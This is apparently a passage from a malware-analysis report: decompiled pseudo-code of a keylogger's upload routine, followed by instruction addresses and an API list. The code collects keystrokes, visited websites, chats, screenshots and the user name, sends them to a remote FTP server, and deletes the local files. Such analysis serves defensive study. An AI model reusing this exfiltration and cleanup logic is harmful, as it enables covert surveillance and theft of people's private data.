    															_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x24), _t513, 2, 0);
    														}
    													}
    													__eflags =  *((char*)(_t661 + 0x14f));
    													if( *((char*)(_t661 + 0x14f)) != 0) {
    														goto L88;
    													} else {
    														__eflags =  *((char*)(_t661 + 0x363));
    														if( *((char*)(_t661 + 0x363)) != 0) {
    															_t450 = E00428DCB( *(_t676 - 0x20));
    															__eflags = _t450;
    															_pop(_t585);
    															if(_t450 != 0) {
    																__eflags =  *((char*)(_t661 + 0x140));
    																_t512 = "chats.html";
    																if( *((char*)(_t661 + 0x140)) == 0) {
    																	_t512 = "bpkch.dat";
    																}
    																_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x20), _t512, 2, 0);
    															}
    														}
    														__eflags =  *((char*)(_t661 + 0x14f));
    														if( *((char*)(_t661 + 0x14f)) == 0) {
    															L89:
    															__eflags =  *((char*)(_t661 + 0x361));
    															if(__eflags == 0) {
    																L96:
    																 *(_t676 - 0x70) = 0x80;
    																GetUserNameA(_t676 - 0x334, _t676 - 0x70);
    																_push("report.txt");
    																_push(0x4558c8);
    																_push(_t676 - 0x5c);
    																L0043DE20();
    																 *(_t676 - 4) = 0x18;
    																_push(_t676 - 0x334);
    																_push(_t676 - 0x3b4);
    																_push(_t676 - 0x2c);
    																_push( *(_t676 - 0x5c));
    																_t458 = E004257A8(__eflags);
    																__eflags = _t458;
    																if(_t458 != 0) {
    																	FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x5c), "report.txt", 2, 0);
    																	_t458 = DeleteFileA( *(_t676 - 0x5c));
    																}
    																_push("dt");
    																L0043DE26();
    																_push(_t458);
    																_t459 = _t676 - 0x68;
    																_push(0x4558c4);
    																_push(_t459);
    																 *(_t676 - 4) = 0x19;
    																L0043E282();
    																_push(0x5c);
    																_push(_t459);
    																 *(_t676 - 4) = 0x1a;
    																_push(_t676 - 0x4c);
    																L0043E14A();
    																 *(_t676 - 4) = 0x1d;
    																L0043DD36();
    																 *(_t676 - 4) = 0x1c;
    																L0043DD36();
    																__eflags =  *((char*)(_t661 + 0x14f));
    																if(__eflags != 0) {
    																	L114:
    																	InternetCloseHandle( *(_t676 + 8));
    																	InternetCloseHandle( *(_t676 - 0x28));
    																	_push("pk.bin");
    																	 *((intOrPtr*)(_t661 + 0x120)) =  *((intOrPtr*)(_t676 - 0x2c));
    																	_push(0x4558c8);
    																	_push(_t676 + 8);
    																	L0043DE20();
    																	 *(_t676 - 4) = 0x2b;
    																	E0040BC5C(_t661, __eflags,  *(_t676 + 8));
    																	 *(_t676 - 4) = 0x1c;
    																	L0043DD36();
    																	 *0x4558e8 =  *0x4558e8 & 0x00000000;
    																	__eflags =  *0x4558e8;
    																	 *(_t676 - 4) = 0x18;
    																	L0043DD36();
    																	 *(_t676 - 4) = 7;
    																	L0043DD36();
    																	_t666 = 1;
    																	goto L115;
    																} else {
    																	__eflags =  *((char*)(_t661 + 0x365));
    																	if(__eflags == 0) {
    																		goto L114;
    																	}
    																	_t669 = "dt";
    																	_t466 = FtpCreateDirectoryA( *(_t676 + 8), _t669);
    																	_push(_t669);
    																	L0043DE26();
    																	_t467 = _t676 - 0x19c;
    																	_push(_t467);
    																	 *(_t676 - 4) = 0x1e;
    																	L0043DE26();
    																	_push(0x2f);
    																	_push(_t467);
    																	_t468 = _t676 - 0x6c;
    																	 *(_t676 - 4) = 0x1f;
    																	_push(_t468);
    																	L0043E14A();
    																	_push(_t466);
    																	_push(_t468);
    																	_t469 = _t676 - 0x60;
    																	 *(_t676 - 4) = 0x20;
    																	_push(_t469);
    																	L0043E282();
    																	_push(0x2f);
    																	_push(_t469);
    																	 *(_t676 - 4) = 0x21;
    																	_push(_t676 - 0x18);
    																	L0043E14A();
    																	 *(_t676 - 4) = 0x26;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x25;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x24;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x23;
    																	L0043DD36();
    																	 *(_t676 - 0x10) =  *(_t676 - 0x10) & 0x00000000;
    																	__eflags =  *(_t676 - 0x7c);
    																	if(__eflags < 0) {
    																		L113:
    																		 *(_t676 - 4) = 0x1c;
    																		L0043DD36();
    																		goto L114;
    																	} else {
    																		goto L101;
    																	}
    																	do {
    																		L101:
    																		_t672 =  *(_t676 - 0x10) << 2;
    																		_push(( *(_t676 - 0x80))[_t672]);
    																		_push(_t676 - 0x18);
    																		_push(_t676 - 0x30);
    																		L0043DE20();
    																		__eflags =  *((char*)(_t661 + 0x140));
    																		 *(_t676 - 4) = 0x27;
    																		if( *((char*)(_t661 + 0x140)) != 0) {
    																			_push(".jpg");
    																			L0043E0CC();
    																		}
    																		_push(( *(_t676 - 0x80))[_t672]);
    																		_push(_t676 - 0x4c);
    																		_t477 = _t676 - 0x40;
    																		_push(_t477);
    																		L0043DE20();
    																		 *(_t676 - 0x34) = FtpPutFileA( *(_t676 + 8),  *_t477,  *(_t676 - 0x30), 2, 0);
    																		L0043DD36();
    																		__eflags =  *(_t676 - 0x34);
    																		if( *(_t676 - 0x34) == 0) {
    																			__eflags =  *(_t676 - 0x44) & 0x00000002;
    																			 *(_t676 - 4) = 0x29;
    																			if(( *(_t676 - 0x44) & 0x00000002) != 0) {
    																				_t358 = _t676 - 0x44;
    																				 *_t358 =  *(_t676 - 0x44) & 0xfffffffd;
    																				__eflags =  *_t358;
    																				L0043DD36();
    																			}
    																			__eflags =  *(_t676 - 0x44) & 0x00000001;
    																			 *(_t676 - 4) = 0x27;
    																			if(( *(_t676 - 0x44) & 0x00000001) == 0) {
    																				goto L112;
    																			} else {
    																				_t365 = _t676 - 0x44;
    																				 *_t365 =  *(_t676 - 0x44) & 0xfffffffe;
    																				__eflags =  *_t365;
    																				goto L111;
    																			}
    																		} else {
    																			__eflags =  *((char*)(_t661 + 0x361));
    																			if( *((char*)(_t661 + 0x361)) == 0) {
    																				goto L112;
    																			}
    																			_push(( *(_t676 - 0x80))[_t672]);
    																			_push(_t676 - 0x4c);
    																			_t483 = _t676 - 0x48;
    																			_push(_t483);
    																			L0043DE20();
    																			DeleteFileA( *_t483);
    																			L0043DD36();
    																			__eflags =  *((char*)(_t661 + 0x140));
    																			if( *((char*)(_t661 + 0x140)) == 0) {
    																				goto L112;
    																			}
    																			_push("th_");
    																			_push(_t676 - 0x4c);
    																			_t487 = _t676 - 0x90;
    																			_push(_t487);
    																			L0043DE20();
    																			_push(( *(_t676 - 0x80))[_t672]);
    																			_push(_t487);
    																			_t488 = _t676 - 0x8c;
    																			 *(_t676 - 4) = 0x28;
    																			_push(_t488);
    																			L0043DE20();
    																			DeleteFileA( *_t488);
    																			L0043DD36();
    																			 *(_t676 - 4) = 0x27;
    																			L111:
    																			L0043DD36();
    																		}
    																		L112:
    																		 *(_t676 - 4) = 0x23;
    																		L0043DD36();
    																		 *(_t676 - 0x10) =  *(_t676 - 0x10) + 1;
    																		__eflags =  *(_t676 - 0x10) -  *(_t676 - 0x7c);
    																	} while (__eflags <= 0);
    																	goto L113;
    																}
    															}
    															E004254F6(L004044C9(E004207A5(L004044C9(_t450, _t585, 0x4558c4) + 0x78), L004044C9(_t450, _t585, 0x4558c4) + 0x78, 0x4558c4));
    															_push("bpkch.dat");
    															_t495 = _t676 - 0x14;
    															_push(0x4558c4);
    															_push(_t495);
    															L0043DE20();
    															DeleteFileA( *_t495);
    															L0043DD36();
    															__eflags =  *((char*)(_t661 + 0x140));
    															if( *((char*)(_t661 + 0x140)) != 0) {
    																DeleteFileA( *(_t676 - 0x1c));
    																DeleteFileA( *(_t676 - 0x24));
    																DeleteFileA( *(_t676 - 0x20));
    															}
    															__eflags =  *((char*)(_t661 + 0x14f));
    															if(__eflags != 0) {
    																DeleteFileA( *(_t676 - 0x38));
    																__eflags =  *((char*)(_t661 + 0x365));
    																if(__eflags == 0) {
    																	goto L96;
    																}
    																 *(_t676 - 0x10) =  *(_t676 - 0x10) & 0x00000000;
    																__eflags =  *(_t676 - 0x7c);
    																if(__eflags < 0) {
    																	goto L96;
    																} else {
    																	goto L95;
    																}
    																do {
    																	L95:
    																	_t498 =  *(_t676 - 0x80);
    																	_push( *((intOrPtr*)(_t498 +  *(_t676 - 0x10) * 4)));
    																	L0043DE26();
    																	 *(_t676 - 0x14) = _t498;
    																	_push("dt");
    																	 *(_t676 - 4) = 0x10;
    																	L0043DE26();
    																	_push(_t498);
    																	_t499 = _t676 - 0x34;
    																	_push(0x4558c4);
    																	_push(_t499);
    																	 *(_t676 - 4) = 0x11;
    																	L0043E282();
    																	_push(0x5c);
    																	_push(_t499);
    																	_t500 = _t676 - 0x40;
    																	 *(_t676 - 4) = 0x12;
    																	_push(_t500);
    																	L0043E14A();
    																	_push( *(_t676 - 0x14));
    																	 *(_t676 - 4) = 0x13;
    																	_push(_t500);
    																	_t501 = _t676 - 0x3c;
    																	_push(_t501);
    																	L0043E282();
    																	DeleteFileA( *_t501);
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x12;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x11;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x10;
    																	L0043DD36();
    																	 *(_t676 - 4) = 7;
    																	L0043DD36();
    																	_t503 =  *(_t676 - 0x80);
    																	_push( *((intOrPtr*)(_t503 +  *(_t676 - 0x10) * 4)));
    																	L0043DE26();
    																	 *(_t676 - 0x14) = _t503;
    																	_push("dt");
    																	 *(_t676 - 4) = 0x14;
    																	L0043DE26();
    																	_push(_t503);
    																	_t504 = _t676 - 0x60;
    																	_push(0x4558c4);
    																	_push(_t504);
    																	 *(_t676 - 4) = 0x15;
    																	L0043E282();
    																	_push("\\th_");
    																	_push(_t504);
    																	_t505 = _t676 - 0x6c;
    																	 *(_t676 - 4) = 0x16;
    																	_push(_t505);
    																	L0043DE20();
    																	_push( *(_t676 - 0x14));
    																	 *(_t676 - 4) = 0x17;
    																	_push(_t505);
    																	_t506 = _t676 - 0x30;
    																	_push(_t506);
    																	L0043E282();
    																	DeleteFileA( *_t506);
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x16;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x15;
    																	L0043DD36();
    																	 *(_t676 - 4) = 0x14;
    																	L0043DD36();
    																	 *(_t676 - 4) = 7;
    																	L0043DD36();
    																	 *(_t676 - 0x10) =  *(_t676 - 0x10) + 1;
    																	__eflags =  *(_t676 - 0x10) -  *(_t676 - 0x7c);
    																} while (__eflags <= 0);
    															}
    															goto L96;
    														} else {
    															goto L88;
    														}
    													}
    												}
    											} else {
    												goto L68;
    											}
    										}
    										_t519 = FtpSetCurrentDirectoryA(_t428, _t676 - 0x19c);
    										__eflags = _t519;
    										if(_t519 != 0) {
    											goto L63;
    										}
    										InternetCloseHandle( *(_t676 + 8));
    										InternetCloseHandle( *(_t676 - 0x28));
    										goto L57;
    									}
    									_push( *(_t676 - 0x28));
    									goto L56;
    								} else {
    									L56:
    									InternetCloseHandle();
    									L57:
    									 *0x4558e8 = 0;
    									_t666 = 0;
    									L115:
    									 *(_t676 - 4) = 6;
    									L0043DD36();
    									goto L116;
    								}
    							}
    							__eflags = _t565 >> 0xa -  *((intOrPtr*)(_t661 + 0x674));
    							if(_t565 >> 0xa >=  *((intOrPtr*)(_t661 + 0x674))) {
    								goto L53;
    							}
    							__eflags =  *((char*)(_t661 + 0x140));
    							if( *((char*)(_t661 + 0x140)) != 0) {
    								DeleteFileA( *(_t676 - 0x50));
    								DeleteFileA( *(_t676 - 0x54));
    								DeleteFileA( *(_t676 - 0x58));
    							}
    							__eflags =  *((char*)(_t661 + 0x14f));
    							if( *((char*)(_t661 + 0x14f)) == 0) {
    								goto L52;
    							} else {
    								_push( *(_t676 - 0x38));
    								goto L51;
    							}
    						}
    						_push("Logs.zip");
    						_t528 = _t676 - 0x18;
    						_push(0x4558c4);
    						_push(_t528);
    						L0043DE20();
    						_push(_t528);
    						 *(_t676 - 4) = 8;
    						L0043DFCA();
    						 *(_t676 - 4) = 7;
    						L0043DD36();
    						_t530 = E004187F0( *(_t676 - 0x38), _t661 + 0x2d4);
    						__eflags =  *(_t661 + 0x362);
    						_t576 = _t530;
    						 *(_t676 - 0x30) = _t530;
    						if( *(_t661 + 0x362) != 0) {
    							_t548 = E00428DCB( *(_t676 - 0x1c));
    							__eflags = _t548;
    							if(_t548 != 0) {
    								__eflags =  *((char*)(_t661 + 0x140));
    								_t549 = "keystrokes.html";
    								if( *((char*)(_t661 + 0x140)) == 0) {
    									_t549 = "bpk.dat";
    								}
    								E0041883F(_t576, _t549,  *(_t676 - 0x1c));
    								_t679 = _t679 + 0xc;
    							}
    						}
    						__eflags =  *((char*)(_t661 + 0x364));
    						if( *((char*)(_t661 + 0x364)) != 0) {
    							_t545 = E00428DCB( *(_t676 - 0x24));
    							__eflags = _t545;
    							if(_t545 != 0) {
    								__eflags =  *((char*)(_t661 + 0x140));
    								_t546 = "websites.html";
    								if( *((char*)(_t661 + 0x140)) == 0) {
    									_t546 = "web.dat";
    								}
    								E0041883F(_t576, _t546,  *(_t676 - 0x24));
    								_t679 = _t679 + 0xc;
    							}
    						}
    						__eflags =  *((char*)(_t661 + 0x363));
    						if( *((char*)(_t661 + 0x363)) != 0) {
    							_t542 = E00428DCB( *(_t676 - 0x20));
    							__eflags = _t542;
    							if(_t542 != 0) {
    								__eflags =  *((char*)(_t661 + 0x140));
    								_t543 = "chats.html";
    								if( *((char*)(_t661 + 0x140)) == 0) {
    									_t543 = "bpkch.dat";
    								}
    								E0041883F(_t576, _t543,  *(_t676 - 0x20));
    								_t679 = _t679 + 0xc;
    							}
    						}
    						__eflags =  *((char*)(_t661 + 0x365));
    						if( *((char*)(_t661 + 0x365)) == 0) {
    							L43:
    							E00418858(_t659,  *(_t676 - 0x30));
    							_t532 = _t676 - 0x5d0;
    							_push(_t532);
    							_push( *(_t676 - 0x38));
    							L0043E294();
    							_t565 =  *(_t676 - 0x5c4);
    							__eflags = _t532;
    							if(_t532 == 0) {
    								_t565 =  *(_t676 + 8);
    							}
    							goto L45;
    						} else {
    							_t577 = 0;
    							__eflags =  *(_t676 - 0x7c);
    							if( *(_t676 - 0x7c) < 0) {
    								goto L43;
    							} else {
    								goto L42;
    							}
    							do {
    								L42:
    								_t533 =  *(_t676 - 0x80);
    								_push( *((intOrPtr*)(_t533 + _t577 * 4)));
    								L0043DE26();
    								 *(_t676 - 0x18) = _t533;
    								_push("dt");
    								 *(_t676 - 4) = 9;
    								L0043DE26();
    								_push(_t533);
    								_t534 = _t676 - 0x40;
    								_push(0x4558c4);
    								_push(_t534);
    								 *(_t676 - 4) = 0xa;
    								L0043E282();
    								_push(0x5c);
    								_push(_t534);
    								_t535 = _t676 - 0x34;
    								 *(_t676 - 4) = 0xb;
    								_push(_t535);
    								L0043E14A();
    								_push( *(_t676 - 0x18));
    								 *(_t676 - 4) = 0xc;
    								_push(_t535);
    								_t536 = _t676 - 0x48;
    								_push(_t536);
    								L0043E282();
    								 *(_t676 - 0x18) =  *_t536;
    								_t538 =  *(_t676 - 0x80);
    								 *(_t676 - 4) = 0xd;
    								_push( *((intOrPtr*)(_t538 + _t577 * 4)));
    								L0043DE26();
    								_push(".jpg");
    								_push(_t538);
    								 *(_t676 - 4) = 0xe;
    								_push(_t676 - 0x10);
    								L0043DE20();
    								 *(_t676 - 4) = 0xf;
    								E0041883F( *(_t676 - 0x30),  *(_t676 - 0x10),  *(_t676 - 0x18));
    								_t679 = _t679 + 0xc;
    								 *(_t676 - 4) = 0xe;
    								L0043DD36();
    								 *(_t676 - 4) = 0xd;
    								L0043DD36();
    								 *(_t676 - 4) = 0xc;
    								L0043DD36();
    								 *(_t676 - 4) = 0xb;
    								L0043DD36();
    								 *(_t676 - 4) = 0xa;
    								L0043DD36();
    								 *(_t676 - 4) = 9;
    								L0043DD36();
    								 *(_t676 - 4) = 7;
    								L0043DD36();
    								_t577 = _t577 + 1;
    								__eflags = _t577 -  *(_t676 - 0x7c);
    							} while (_t577 <=  *(_t676 - 0x7c));
    							goto L43;
    						}
    					} else {
    						 *0x4558e8 =  *0x4558e8 & _t565;
    						_t666 = 0;
    						L116:
    						 *(_t676 - 4) = 5;
    						E0042839B(_t676 - 0x84);
    						 *(_t676 - 4) = 4;
    						L0043DD36();
    						 *(_t676 - 4) = 3;
    						L0043DD36();
    						 *(_t676 - 4) = 2;
    						L0043DD36();
    						 *(_t676 - 4) = 1;
    						L0043DD36();
    						 *(_t676 - 4) =  *(_t676 - 4) & 0x00000000;
    						L0043DD36();
    						_t403 = _t676 - 4;
    						 *_t403 =  *(_t676 - 4) | 0xffffffff;
    						__eflags =  *_t403;
    						L0043DD36();
    						_t445 = _t666;
    						goto L117;
    					}
    				} else {
    					 *0x4558e8 =  *0x4558e8 & 0x00000000;
    					_t445 = 0;
    					L117:
    					 *[fs:0x0] =  *((intOrPtr*)(_t676 - 0xc));
    					return _t445;
    				}
    			}

    0x004258ff
    0x00425904
    0x00425909
    0x0042590f
    0x00425917
    0x00425918
    0x0042591d
    0x00425927
    0x0042593e
    0x00425946
    0x00425947
    0x00425948
    0x0042594d
    0x00425951
    0x00425959
    0x0042595a
    0x0042595b
    0x00425960
    0x00425968
    0x00425969
    0x0042596a
    0x0042596e
    0x00425978
    0x00425980
    0x00425981
    0x00425982
    0x00425986
    0x0042598b
    0x00425993
    0x00425994
    0x00425995
    0x00425999
    0x0042599e
    0x004259a6
    0x004259a7
    0x004259a8
    0x004259ac
    0x004259b1
    0x004259b8
    0x004259bc
    0x004259be
    0x004259c0
    0x004259c3
    0x004259c6
    0x004259cb
    0x004259ce
    0x004259d0
    0x004259d8
    0x004259d9
    0x004259d9
    0x004259de
    0x004259e5
    0x004259e7
    0x004259e9
    0x004259ec
    0x004259ef
    0x004259f4
    0x004259f7
    0x004259f9
    0x00425a01
    0x00425a02
    0x00425a02
    0x00425a07
    0x00425a0e
    0x00425a10
    0x00425a12
    0x00425a15
    0x00425a18
    0x00425a1d
    0x00425a20
    0x00425a22
    0x00425a2a
    0x00425a2b
    0x00425a2b
    0x00425a22
    0x00425a0e
    0x004259e5
    0x00425a30
    0x00425a3b
    0x00425a3e
    0x00425a43
    0x00425a49
    0x00425a4f
    0x00425a53
    0x00425a55
    0x00425a5b
    0x00425a5c
    0x00425a5f
    0x00425a64
    0x00425a66
    0x00425a68
    0x00425a6e
    0x00425a6e
    0x00425a66
    0x00425a71
    0x00425a78
    0x00425a7a
    0x00425a80
    0x00425a81
    0x00425a84
    0x00425a89
    0x00425a8b
    0x00425a8d
    0x00425a8d
    0x00425a93
    0x00425a93
    0x00425a8b
    0x00425a96
    0x00425a9d
    0x00425a9f
    0x00425aa5
    0x00425aa6
    0x00425aa9
    0x00425aae
    0x00425ab0
    0x00425ab2
    0x00425ab2
    0x00425ab8
    0x00425ab8
    0x00425ab0
    0x00425abb
    0x00425ac2
    0x00425aca
    0x00425ad1
    0x00425ad2
    0x00425ad3
    0x00425ad8
    0x00425adb
    0x00425adb
    0x00425ae1
    0x00425ae1
    0x00425ae4
    0x00425ae6
    0x00425af8
    0x00425afd
    0x00425b04
    0x00425b08
    0x00425d1a
    0x00425d1a
    0x00425d21
    0x00425d67
    0x00425d7b
    0x00425d7d
    0x00425d84
    0x00425d92
    0x00425d92
    0x00425d9f
    0x00425da5
    0x00425da7
    0x00425daa
    0x00425dab
    0x00425dc8
    0x00425df2
    0x00425df8
    0x00425dfa
    0x00425dfd
    0x00425e04
    0x00425e0b
    0x00425e31
    0x00425e34
    0x00425e43
    0x00425e4e
    0x00425e4f
    0x00425e54
    0x00425e56
    0x00425e5a
    0x00425e5d
    0x00425e62
    0x00425e65
    0x00425e69
    0x00425e6c
    0x00425e71
    0x00425e74
    0x00425e78
    0x00425e7b
    0x00425e80
    0x00425e83
    0x00425e87
    0x00425e8a
    0x00425e92
    0x00425e94
    0x00425e98
    0x00425ebf
    0x00425ed2
    0x00425ed8
    0x00425eda
    0x00425f34
    0x00425f3d
    0x00425f3f
    0x00425d58
    0x00425d58
    0x00425d5a
    0x00425d5a
    0x00425d5c
    0x00000000
    0x00425d5c
    0x00425edc
    0x00425ee9
    0x00425ef2
    0x00425ef8
    0x00425f00
    0x00425f0e
    0x00425f0e
    0x00425f00
    0x00425f1e
    0x00425f2a
    0x00425f30
    0x00425f32
    0x00425f47
    0x00425f54
    0x00425f56
    0x00425f5d
    0x00425f62
    0x00425f67
    0x00425f69
    0x00425f6a
    0x00425f6c
    0x00425f73
    0x00425f78
    0x00425f7a
    0x00425f7a
    0x00425f8a
    0x00425f8a
    0x00425f6a
    0x00425f5d
    0x00425f8c
    0x00425f93
    0x00426013
    0x00426022
    0x00000000
    0x00425f95
    0x00425f95
    0x00425f9c
    0x00425fa1
    0x00425fa6
    0x00425fa8
    0x00425fa9
    0x00425fab
    0x00425fb2
    0x00425fb7
    0x00425fb9
    0x00425fb9
    0x00425fc9
    0x00425fc9
    0x00425fa9
    0x00425fcb
    0x00425fd2
    0x00000000
    0x00425fd4
    0x00425fd4
    0x00425fdb
    0x00425fe0
    0x00425fe5
    0x00425fe7
    0x00425fe8
    0x00425fea
    0x00425ff1
    0x00425ff6
    0x00425ff8
    0x00425ff8
    0x00426008
    0x00426008
    0x00425fe8
    0x0042600a
    0x00426011
    0x00426024
    0x00426024
    0x00426031
    0x004261e6
    0x004261e9
    0x004261f8
    0x004261fe
    0x00426206
    0x0042620b
    0x0042620c
    0x00426217
    0x0042621b
    0x00426222
    0x00426226
    0x00426227
    0x0042622a
    0x00426232
    0x00426234
    0x00426245
    0x0042624e
    0x0042624e
    0x00426250
    0x00426258
    0x0042625d
    0x0042625e
    0x00426261
    0x00426262
    0x00426263
    0x00426267
    0x0042626c
    0x0042626e
    0x00426272
    0x00426276
    0x00426277
    0x0042627f
    0x00426283
    0x0042628b
    0x0042628f
    0x00426294
    0x0042629b
    0x00426498
    0x004264a1
    0x004264a6
    0x004264ab
    0x004264b0
    0x004264b9
    0x004264be
    0x004264bf
    0x004264c8
    0x004264cc
    0x004264d4
    0x004264d8
    0x004264dd
    0x004264dd
    0x004264e7
    0x004264eb
    0x004264f3
    0x004264f7
    0x004264fe
    0x00000000
    0x004262a1
    0x004262a1
    0x004262a8
    0x00000000
    0x00000000
    0x004262ae
    0x004262b7
    0x004262bd
    0x004262c1
    0x004262c8
    0x004262d1
    0x004262d2
    0x004262d6
    0x004262db
    0x004262dd
    0x004262de
    0x004262e1
    0x004262e5
    0x004262e6
    0x004262eb
    0x004262ec
    0x004262ed
    0x004262f0
    0x004262f4
    0x004262f5
    0x004262fa
    0x004262fc
    0x00426300
    0x00426304
    0x00426305
    0x0042630d
    0x00426311
    0x00426319
    0x0042631d
    0x00426325
    0x00426329
    0x00426331
    0x00426335
    0x0042633a
    0x0042633e
    0x00426342
    0x0042648c
    0x0042648f
    0x00426493
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00426348
    0x00426348
    0x00426350
    0x00426353
    0x00426359
    0x0042635d
    0x0042635e
    0x00426363
    0x0042636a
    0x0042636e
    0x00426370
    0x00426378
    0x00426378
    0x00426380
    0x00426386
    0x00426387
    0x0042638a
    0x0042638b
    0x004263a6
    0x004263a9
    0x004263ae
    0x004263b2
    0x00426439
    0x0042643d
    0x00426444
    0x00426446
    0x00426446
    0x00426446
    0x00426450
    0x00426450
    0x00426455
    0x00426459
    0x00426460
    0x00000000
    0x00426462
    0x00426462
    0x00426462
    0x00426462
    0x00000000
    0x00426466
    0x004263b8
    0x004263b8
    0x004263bf
    0x00000000
    0x00000000
    0x004263c8
    0x004263ce
    0x004263cf
    0x004263d2
    0x004263d3
    0x004263da
    0x004263df
    0x004263e4
    0x004263eb
    0x00000000
    0x00000000
    0x004263f4
    0x004263ff
    0x00426400
    0x00426406
    0x00426407
    0x0042640c
    0x0042640d
    0x0042640e
    0x00426414
    0x00426418
    0x00426419
    0x00426420
    0x00426428
    0x0042642d
    0x0042646c
    0x0042646c
    0x0042646c
    0x00426471
    0x00426474
    0x00426478
    0x0042647d
    0x00426483
    0x00426483
    0x00000000
    0x00426348
    0x0042629b
    0x0042604d
    0x00426052
    0x00426057
    0x0042605a
    0x0042605b
    0x0042605c
    0x00426063
    0x00426068
    0x0042606d
    0x00426074
    0x00426079
    0x0042607e
    0x00426083
    0x00426083
    0x00426085
    0x0042608c
    0x00426095
    0x00426097
    0x0042609e
    0x00000000
    0x00000000
    0x004260a4
    0x004260a8
    0x004260ac
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004260b2
    0x004260b2
    0x004260b2
    0x004260b8
    0x004260be
    0x004260c3
    0x004260c6
    0x004260ce
    0x004260d2
    0x004260d7
    0x004260d8
    0x004260db
    0x004260dc
    0x004260dd
    0x004260e1
    0x004260e6
    0x004260e8
    0x004260e9
    0x004260ec
    0x004260f0
    0x004260f1
    0x004260f6
    0x004260f9
    0x004260fd
    0x004260fe
    0x00426101
    0x00426102
    0x00426109
    0x0042610e
    0x00426116
    0x0042611a
    0x00426122
    0x00426126
    0x0042612e
    0x00426132
    0x0042613a
    0x0042613e
    0x00426143
    0x00426149
    0x0042614f
    0x00426154
    0x00426157
    0x0042615f
    0x00426163
    0x00426168
    0x00426169
    0x0042616c
    0x0042616d
    0x0042616e
    0x00426172
    0x00426177
    0x0042617c
    0x0042617d
    0x00426180
    0x00426184
    0x00426185
    0x0042618a
    0x0042618d
    0x00426191
    0x00426192
    0x00426195
    0x00426196
    0x0042619d
    0x004261a2
    0x004261aa
    0x004261ae
    0x004261b6
    0x004261ba
    0x004261c2
    0x004261c6
    0x004261ce
    0x004261d2
    0x004261d7
    0x004261dd
    0x004261dd
    0x004260b2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00426011
    0x00425fd2
    0x00000000
    0x00000000
    0x00000000
    0x00425f32
    0x00425e15
    0x00425e1b
    0x00425e1d
    0x00000000
    0x00000000
    0x00425e28
    0x00425e2d
    0x00000000
    0x00425e2d
    0x00425dff
    0x00000000
    0x00425dad
    0x00425dad
    0x00425dad
    0x00425db3
    0x00425db3
    0x00425db9
    0x004264ff
    0x00426502
    0x00426506
    0x00000000
    0x00426506
    0x00425dab
    0x00425d26
    0x00425d2c
    0x00000000
    0x00000000
    0x00425d2e
    0x00425d3b
    0x00425d40
    0x00425d45
    0x00425d4a
    0x00425d4a
    0x00425d4c
    0x00425d53
    0x00000000
    0x00425d55
    0x00425d55
    0x00000000
    0x00425d55
    0x00425d53
    0x00425b0e
    0x00425b13
    0x00425b16
    0x00425b17
    0x00425b18
    0x00425b1d
    0x00425b21
    0x00425b25
    0x00425b2d
    0x00425b31
    0x00425b40
    0x00425b45
    0x00425b4d
    0x00425b50
    0x00425b53
    0x00425b58
    0x00425b5d
    0x00425b60
    0x00425b62
    0x00425b69
    0x00425b6e
    0x00425b70
    0x00425b70
    0x00425b7a
    0x00425b7f
    0x00425b7f
    0x00425b60
    0x00425b82
    0x00425b89
    0x00425b8e
    0x00425b93
    0x00425b96
    0x00425b98
    0x00425b9f
    0x00425ba4
    0x00425ba6
    0x00425ba6
    0x00425bb0
    0x00425bb5
    0x00425bb5
    0x00425b96
    0x00425bb8
    0x00425bbf
    0x00425bc4
    0x00425bc9
    0x00425bcc
    0x00425bce
    0x00425bd5
    0x00425bda
    0x00425bdc
    0x00425bdc
    0x00425be6
    0x00425beb
    0x00425beb
    0x00425bcc
    0x00425bee
    0x00425bf5
    0x00425cf5
    0x00425cf8
    0x00425cfe
    0x00425d04
    0x00425d05
    0x00425d08
    0x00425d0d
    0x00425d13
    0x00425d15
    0x00425d17
    0x00425d17
    0x00000000
    0x00425bfb
    0x00425bfb
    0x00425bfd
    0x00425c00
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00425c06
    0x00425c06
    0x00425c06
    0x00425c0c
    0x00425c0f
    0x00425c14
    0x00425c17
    0x00425c1f
    0x00425c23
    0x00425c28
    0x00425c29
    0x00425c2c
    0x00425c2d
    0x00425c2e
    0x00425c32
    0x00425c37
    0x00425c39
    0x00425c3a
    0x00425c3d
    0x00425c41
    0x00425c42
    0x00425c47
    0x00425c4a
    0x00425c4e
    0x00425c4f
    0x00425c52
    0x00425c53
    0x00425c5d
    0x00425c60
    0x00425c63
    0x00425c67
    0x00425c6a
    0x00425c6f
    0x00425c74
    0x00425c78
    0x00425c7c
    0x00425c7d
    0x00425c87
    0x00425c8f
    0x00425c94
    0x00425c9a
    0x00425c9e
    0x00425ca6
    0x00425caa
    0x00425cb2
    0x00425cb6
    0x00425cbe
    0x00425cc2
    0x00425cca
    0x00425cce
    0x00425cd6
    0x00425cda
    0x00425ce2
    0x00425ce6
    0x00425ceb
    0x00425cec
    0x00425cec
    0x00000000
    0x00425c06
    0x00425ae8
    0x00425ae8
    0x00425aee
    0x0042650b
    0x00426511
    0x00426515
    0x0042651d
    0x00426521
    0x00426529
    0x0042652d
    0x00426535
    0x00426539
    0x00426541
    0x00426545
    0x0042654a
    0x00426551
    0x00426556
    0x00426556
    0x00426556
    0x0042655d
    0x00426562
    0x00000000
    0x00426565
    0x00425929
    0x00425929
    0x00425930
    0x00426566
    0x0042656a
    0x00426572
    0x00426572

    APIs
    • __EH_prolog.LIBCMT ref: 00425904
    • #3811.MFC42(?), ref: 00425918
    • #924.MFC42(?,004558C4,bpk.dat,?,?,?), ref: 00425948
    • #924.MFC42(?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,?), ref: 0042595B
    • #924.MFC42(?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,?), ref: 0042596E
